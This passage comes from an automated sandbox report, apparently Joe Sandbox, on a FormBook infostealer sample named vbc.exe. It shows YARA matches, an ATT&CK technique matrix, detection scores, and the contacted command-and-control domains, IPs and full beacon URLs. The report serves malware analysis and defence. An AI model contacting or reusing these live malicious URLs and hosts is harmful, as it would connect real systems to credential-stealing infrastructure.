Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 8.0.vbc.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.vbc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.vbc.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vbc.exe.3bfcd00.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.vbc.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.vbc.exe.3bb72e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.343817848.00000000012F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.261930236.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.261342946.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.513280768.0000000002B40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.264514879.0000000003AA9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.512917942.0000000002A40000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.511655958.0000000000270000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.343872613.0000000001320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.296889219.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.312766069.000000000E75A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.342880104.0000000000400000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scheduled Task/Job1	Scheduled Task/Job1	Process Injection512	Masquerading1	Input Capture1	Query Registry1	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Shared Modules1	Boot or Logon Initialization Scripts	Scheduled Task/Job1	Disable or Modify Tools11	LSASS Memory	Security Software Discovery221	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer3	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion31	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol3	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection512	NTDS	Virtualization/Sandbox Evasion31	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information3	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Software Packing13	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	File and Directory Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery112	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
8.0.vbc.exe.400000.6.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
8.2.vbc.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
8.0.vbc.exe.400000.4.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
8.0.vbc.exe.400000.8.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
www.miabellavita.com	0%	Virustotal		Browse
mattlambert.xyz	4%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
www.septemberstockevent200.com/ht08/	0%	Avira URL Cloud	safe
http://www.septemberstockevent200.com/ht08/?iJB=YVcVQnADBOxtkizi8PwpXZC8MGRy3pUK9Tt3i8wwHZUtpCp/3ZP4J1retOso95pi3Qz1GtS4tg==&IfNL=N8ph5BwH	0%	Avira URL Cloud	safe
http://www.joye.club/ht08/?iJB=fVUe8feYpN4PFMr+KvtZZrG4xoghHK64bhP/N9fXdzCzpP/t7mUgEUqRnlKHZLETABk8BcDy+g==&IfNL=N8ph5BwH	100%	Avira URL Cloud	phishing
http://www.maikoufarm.com/ht08/?iJB=Nn3GQotxroHeSkioJYlyOg7hZYbVcqG0YP1z9npFKY7KnSOBRhEQe9R9FJ0MVZ+9dT/G4+QqxQ==&IfNL=N8ph5BwH	0%	Avira URL Cloud	safe
http://www.miabellavita.com/ht08/?iJB=7p5yDMcVtDK+2VMLZex1Kw5DaL8n+amtJoDm972Jkr9Bm6oPOM+PHzWXusl+HrepqAW+ZRiK3Q==&IfNL=N8ph5BwH	0%	Avira URL Cloud	safe
http://www.mattlambert.xyz/ht08/?iJB=tWyE4dKPScuS56voJaD4LHzf4KVLRr2HjGj+V9mFA/0BkTQ5rlgiVQpU1IInoYX1Wdu+PEboiA==&IfNL=N8ph5BwH	100%	Avira URL Cloud	phishing
http://www.sharpstead.com/ht08/?iJB=mF30mN7A1kBKKp3mrHfcBE8aj8d3j5TIPkteVwKSLkWL0x2hCorpOf84nkcbs5VIH8t4m4OlHQ==&IfNL=N8ph5BwH	0%	Avira URL Cloud	safe
http://www.mmj0115.xyz/ht08/?iJB=wOE3x7GIWdnAHRhnI1Z2es1853h2m7xTnUUyaHf9EMpp2ij5NZFAPBiYMZ80Da0iVaPeuYXsZg==&IfNL=N8ph5BwH	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.septemberstockevent200.com	172.67.188.247	true	true		unknown
www.miabellavita.com	104.21.4.114	true	true	0%, Virustotal, Browse	unknown
mattlambert.xyz	34.102.136.180	true	false	4%, Virustotal, Browse	unknown
z010-gp-hk-06-75-adfh31.greycdn.net	103.118.81.108	true	false		unknown
www.maikoufarm.com	118.27.122.222	true	true		unknown
www.sharpstead.com	44.227.65.245	true	true		unknown
joye.club	34.102.136.180	true	false		unknown
yungbredda.com	34.102.136.180	true	false		unknown
www.mmj0115.xyz	101.132.116.91	true	true		unknown
ghs.googlehosted.com	142.250.203.115	true	false		unknown
www.watermountsteam.top	unknown	unknown	true		unknown
www.joye.club	unknown	unknown	true		unknown
www.yungbredda.com	unknown	unknown	true		unknown
www.leewaysvcs.com	unknown	unknown	true		unknown
www.joy1263.com	unknown	unknown	true		unknown
www.annikadaniel.love	unknown	unknown	true		unknown
www.mattlambert.xyz	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
www.septemberstockevent200.com/ht08/	true	Avira URL Cloud: safe	low
http://www.septemberstockevent200.com/ht08/?iJB=YVcVQnADBOxtkizi8PwpXZC8MGRy3pUK9Tt3i8wwHZUtpCp/3ZP4J1retOso95pi3Qz1GtS4tg==&IfNL=N8ph5BwH	true	Avira URL Cloud: safe	unknown
http://www.joye.club/ht08/?iJB=fVUe8feYpN4PFMr+KvtZZrG4xoghHK64bhP/N9fXdzCzpP/t7mUgEUqRnlKHZLETABk8BcDy+g==&IfNL=N8ph5BwH	false	Avira URL Cloud: phishing	unknown
http://www.maikoufarm.com/ht08/?iJB=Nn3GQotxroHeSkioJYlyOg7hZYbVcqG0YP1z9npFKY7KnSOBRhEQe9R9FJ0MVZ+9dT/G4+QqxQ==&IfNL=N8ph5BwH	true	Avira URL Cloud: safe	unknown
http://www.miabellavita.com/ht08/?iJB=7p5yDMcVtDK+2VMLZex1Kw5DaL8n+amtJoDm972Jkr9Bm6oPOM+PHzWXusl+HrepqAW+ZRiK3Q==&IfNL=N8ph5BwH	true	Avira URL Cloud: safe	unknown
http://www.mattlambert.xyz/ht08/?iJB=tWyE4dKPScuS56voJaD4LHzf4KVLRr2HjGj+V9mFA/0BkTQ5rlgiVQpU1IInoYX1Wdu+PEboiA==&IfNL=N8ph5BwH	false	Avira URL Cloud: phishing	unknown
http://www.sharpstead.com/ht08/?iJB=mF30mN7A1kBKKp3mrHfcBE8aj8d3j5TIPkteVwKSLkWL0x2hCorpOf84nkcbs5VIH8t4m4OlHQ==&IfNL=N8ph5BwH	true	Avira URL Cloud: safe	unknown
http://www.mmj0115.xyz/ht08/?iJB=wOE3x7GIWdnAHRhnI1Z2es1853h2m7xTnUUyaHf9EMpp2ij5NZFAPBiYMZ80Da0iVaPeuYXsZg==&IfNL=N8ph5BwH	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.autoitscript.com/autoit3/J	explorer.exe, 0000000B.00000000.291685186.0000000006870000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	vbc.exe, 00000000.00000002.264277671.0000000002AA1000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.4.114	www.miabellavita.com	United States	13335	CLOUDFLARENETUS	true
34.102.136.180	mattlambert.xyz	United States	15169	GOOGLEUS	false
118.27.122.222	www.maikoufarm.com	Japan	7506	INTERQGMOInternetIncJP	true
172.67.188.247	www.septemberstockevent200.com	United States	13335	CLOUDFLARENETUS	true
101.132.116.91	www.mmj0115.xyz	China	37963	CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd	true
44.227.65.245	www.sharpstead.com	United States	16509	AMAZON-02US	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	518412
Start date:	09.11.2021
Start time:	12:55:04
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 45s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	vbc.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	29
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@10/8@14/6
EGA Information:	Failed
HDC Information:	Successful, ratio: 2.8% (good quality ratio 2.6%) Quality average: 75.8% Quality standard deviation: 29.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 71 Number of non-executed functions: 100
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:56:03	API Interceptor	1x Sleep call for process: vbc.exe modified
12:56:08	API Interceptor	41x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
118.27.122.222	file0_stage3.dll	Get hash	malicious	Browse	www.nekomediphile.com/n8rn/?p2M=BeS87FoxVkTke2MRb0qima65PDce7tJfTymmK4/q26Kf4LPrWppSbx1BH8kQDaEu6kDG&zFNL=5jK4uHQH-rfXmT
118.27.122.222	HPMT ORDER LIST.exe	Get hash	malicious	Browse	www.ch-foster.com/n6be/?a6=2tOAPcEgYTHD567WF8XvxxEvgHLBbJMXTAUhjj7+D0ChXZUXC+Pn67n//wg0XKB52YMX&4hYl=8pPLKztPMLrhEvWP
44.227.65.245	Quote request.exe	Get hash	malicious	Browse	www.dietjakarta.com/s2qi/?TJELpfLP=qOzazkHAVvIGDra8b9OWW7CQPYry4NAftY2oZLUdYfYDTW+xNyVbwU9NOeXebbzy0cbp&lZwxYz=y6AldH-
	SAMPLES2.xlsx	Get hash	malicious	Browse	www.kisah.xyz/sywu/?8p2=USn/s/N3qxIF4+EyQZdH7vYZi5cG3dzFHZRqO94C2q7bkP8vqLkNegTqp14nFiAPIy6Ubg==&3f=0ltDIRtH
	Purchase Order-10,000MT.exe	Get hash	malicious	Browse	www.brunchy.one/z4m5/?8pW8=zNPWEz3pIEHibvS4bsIXDPiznK4rKMrVGAhmY+HWnOPy3ASb809gbr8Dwg2gtflOJLni&gD=-ZfPOL
	ITRli68rgq.exe	Get hash	malicious	Browse	www.innoattic.com/bs8f/?3fKPRDU=gPvbgkUrDAv1uZACg3Tla1oGEdPTt04jzJdg29vz63COe4p03SEL16juZWtXBmvFy2F4&of=9rSLDPtHxj9hfT
	NUo71b3C4p.exe	Get hash	malicious	Browse	www.fleetton.com/fqiq/?08CT3r=3MX+rG6vdLdtgz7jmcjGUKQb8RZ/Wti45jSOZX8Y4yp8kay6zbO3XF8pw6EX/prOJZe4&fB8P=4hMPVF78e
	November 2021 Update RFQ 3271737.exe	Get hash	malicious	Browse	www.jadesrc.com/nc26/?SBZL=d3TYBFuVdrdzP8EyjnH49SiPUjZ6Ux+6cUTZqX+JgS7gU0O8rbqz6CXYuXQkXkTXNal/&D48=c2MHtVyHNxCxXp7
	QtDfFXiECh.exe	Get hash	malicious	Browse	www.203040302.xyz/pufi/?4hb=4hixbv&4h=SazsJgrxJuJNqlYiRzL3ozLk5u53xI01dSvrBHbbk0SB79U4uRUkWEJGSj7nxn+KPfiwTyd4PQ==
	Invoice #00442811-20211029.2.exe	Get hash	malicious	Browse	www.indigobunk.com/b4a0/?EJBHHDyP=BfJ5Bx9UPWuRIZP3b2BXXNlSngsTafG3lcH0rf8/gIGUgH6boOVAW06sJRU4KdudULjy&y48=8pnHll3
	vbc.exe	Get hash	malicious	Browse	www.sharpstead.com/ht08/?e4R=mF30mN7A1kBKKp3mrHfcBE8aj8d3j5TIPkteVwKSLkWL0x2hCorpOf84nnwyv5pwOfYu&j2MXQ6=3fH4ADA
	Requested Items.xlsx	Get hash	malicious	Browse	www.magentavar.com/upi8/?B6=q+sSkz7sAwA4yBB5hWVCxKsuYiMLYHWGeaAggxOaMa4Qocc6YFkdsfdinLpG1SJGl/Ax9Q==&1bFX=0dhH
	lCFjxhAqu3.exe	Get hash	malicious	Browse	www.thr33h3ad3ddragon.art/upi8/?vzr=YyCvSGoAtncS4QUVQZyNjC8cIPJnO/XAnIrSRYtWY0buq7vZ6yNDf+1DqJ4JQv1LHvgP&8pm4=_l6t
	PO 800A3E4.exe	Get hash	malicious	Browse	www.analytico-australis.com/c249/?B48dyrUp=M3oufGH8Bm9b66gzFBXlxSE22zEX1ZdvV3sOjxFBFhL2n1u58TbTRysEXKK/l8JgYoT+&oZ=YlPhVdwxfPPXAPX
	triage_dropped_file.exe	Get hash	malicious	Browse	www.fleetton.com/fqiq/?oJE=3MX+rG6vdLdtgz7jmcjGUKQb8RZ/Wti45jSOZX8Y4yp8kay6zbO3XF8pw6EX/prOJZe4&u6KLb=Wp6xUr6h5
	PO 4910007391 CHANGZHOU.xlsx	Get hash	malicious	Browse	www.fleetton.com/fqiq/?k2Mtd=0bGdKhdpsjULqrw&i4Z4rjR=3MX+rG6qdMdpgj3vkcjGUKQb8RZ/Wti45jKeFUgZ8Sp9kre80Lf7BBErzfoB75v9CaDIsg==
	m9azdNJhg2.exe	Get hash	malicious	Browse	www.nothernballet.com/scb0/?P0=oJTIyACWMBuXH8n/EzWjLujKpZPXvTg1NdfRIzqIYFKP8QC8fyVAQXGjBdWKl8hRd6mD&xX=8pjHvFr0NV
	Copia de pago_pdf.exe	Get hash	malicious	Browse	www.jadeshelf.com/p4qi/?2d90bV=1bBLMh&X4=p5BmMS75A/JtgYvVfEDbSkCSvpUzgvUEAewD9F+BpXWJwpteyHvtZR0Kels1fz0BLcm1
	7ivFMbol8b.exe	Get hash	malicious	Browse	www.keenflat.com/m0np/?7n6T=A0GTW8QxnP4hPnA&ETJ8pHk=JnbxNM/rTFifoybGWxqKaXuLsTV7lalyqj1QG2sxy/+1c2rYA5SuNyU7nbkA5B+D+0NP
	EhB2SUfLy2.exe	Get hash	malicious	Browse	www.keenflat.com/m0np/?l8=JnbxNM/rTFifoybGWxqKaXuLsTV7lalyqj1QG2sxy/+1c2rYA5SuNyU7nbkqmxOD62FP&YZsPJr=HJEL06c80X
	1SGErShR6f.exe	Get hash	malicious	Browse	www.commentcard.club/9gdg/?-Zy0C=qf3xl6MENRZ21DZ7gzuwiwLEYsFOD+EdiSexsqSt7LhuNUdogHACIO8bybDoj5UhYm+TCOWmJA==&lN=5jot7b-
	Peq0Amq9EP.exe	Get hash	malicious	Browse	www.bittywire.com/qs23/?m6A=hl8hup_P5x&5jOl7vcx=iP0xukhXBAsLs4o+4LAMqW8C7tqrmiTZ/jO8lNLuZc/21gA7KI5zfXAl5NvJFH5jMmYiJAEXuw==

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
www.sharpstead.com	vbc.exe	Get hash	malicious	Browse	44.227.65.245
ghs.googlehosted.com	P. INVOICE.exe	Get hash	malicious	Browse	142.250.203.115
	PRODUCT LIST.doc	Get hash	malicious	Browse	216.58.206.83
	uLjkrnawIw.exe	Get hash	malicious	Browse	216.58.208.147
	f7e1vlOrJP.exe	Get hash	malicious	Browse	142.250.185.179
	pO3zAA9lwc.exe	Get hash	malicious	Browse	142.250.185.211
	company business card (2).exe	Get hash	malicious	Browse	172.217.168.51
	xUKQ7vGCmR.exe	Get hash	malicious	Browse	142.250.185.211
	jk6CjxfJsQ.exe	Get hash	malicious	Browse	142.250.185.211
	DHL202038,PDF.exe	Get hash	malicious	Browse	142.250.181.243
	PCB 102021.EXE	Get hash	malicious	Browse	142.250.181.243
	AL Bijjar Trading FZC Requirement.xlsx	Get hash	malicious	Browse	142.250.181.243
	pBFXGQZbY6.exe	Get hash	malicious	Browse	142.250.181.243
	kHS7OeVw4a.rtf	Get hash	malicious	Browse	142.250.181.243
	HIC INTERNACIONAL - DOCUMENTS(RFQ20212211).exe	Get hash	malicious	Browse	172.217.168.51
	shipping Docs.pdf.exe	Get hash	malicious	Browse	172.217.168.51
	RFQ21116.exe	Get hash	malicious	Browse	172.217.168.51
	rundll32.exe	Get hash	malicious	Browse	142.250.203.115
	nf15RFi8vl.exe	Get hash	malicious	Browse	142.250.203.115
	New Offer to Thalassa Imports nv-sa._200317.xlsx.exe	Get hash	malicious	Browse	142.250.203.115
	DHL_Delivery_Confirmation.exe	Get hash	malicious	Browse	142.250.203.115
www.miabellavita.com	vbc.exe	Get hash	malicious	Browse	172.67.132.7

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	Vergi #U00f6deme faturas#U0131 9 Kas#U0131m 2021 Sal#U0131,pdf.exe	Get hash	malicious	Browse	172.67.217.17
	REQUEST FOR QUOTATION.exe	Get hash	malicious	Browse	172.67.199.195
	uCkIzRN4ZzUIzCY.exe	Get hash	malicious	Browse	104.21.42.115
	kA1GNOTJ2VgnL02.exe	Get hash	malicious	Browse	172.67.217.39
	setup_installer.exe	Get hash	malicious	Browse	172.67.176.199
	TF -11082148.exe	Get hash	malicious	Browse	104.17.207.37
	Proforma Invoice, New order.exe	Get hash	malicious	Browse	162.159.129.233
	PI 01KSD-AB2021.exe	Get hash	malicious	Browse	162.159.133.233
	TqNOgkfVVu.exe	Get hash	malicious	Browse	162.159.133.233
	Halkbank_Ekstre_20211108_073719_486930.exe	Get hash	malicious	Browse	104.21.19.200
	ExportUSA Corp RFQ 6000567507.doc	Get hash	malicious	Browse	23.227.38.74
	CB7D321954760DE22CCBF59ECE43D94E503350B18203D.exe	Get hash	malicious	Browse	172.67.128.223
	Halkbank_Ekstre_20211108_073719_486930.pdf.exe	Get hash	malicious	Browse	104.21.19.200
	tanglebot.apk	Get hash	malicious	Browse	172.67.136.207
	vaeSTdfo17.exe	Get hash	malicious	Browse	162.159.134.233
	D1F610AF3C46FFF6C857BE0136C696604EB8E7466B4A7.exe	Get hash	malicious	Browse	104.21.6.12
	F1F6AEEE9A42004E68765A83E9CBD51BC878A0AFD7C80.exe	Get hash	malicious	Browse	104.21.6.12
	zJam66tNHE0o5Ai.exe	Get hash	malicious	Browse	104.21.18.247
	com.sibche.aspardproject.app.apk	Get hash	malicious	Browse	104.18.29.147
	ATT00002.html	Get hash	malicious	Browse	104.16.126.175
INTERQGMOInternetIncJP	Quote request.exe	Get hash	malicious	Browse	118.27.122.150
	Purchase Order - 10,000MT.exe	Get hash	malicious	Browse	118.27.122.221
	044b.pdf.exe	Get hash	malicious	Browse	163.44.185.185
	jVjGBmjH6I.exe	Get hash	malicious	Browse	157.7.107.193
